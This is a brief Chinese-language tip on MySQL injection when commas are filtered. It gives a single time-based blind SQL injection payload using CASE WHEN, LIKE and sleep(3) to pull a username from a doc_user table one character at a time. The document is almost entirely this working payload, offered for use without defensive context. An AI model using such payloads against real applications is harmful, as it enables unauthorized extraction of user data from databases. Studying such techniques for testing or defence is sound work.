Mysql注入不能使用逗号

  1. case when then + “延迟盲注”
  1. select case when (select username from (select * from doc_user) as a where id=1) like 'a%' then sleep(3) else sleep(0) end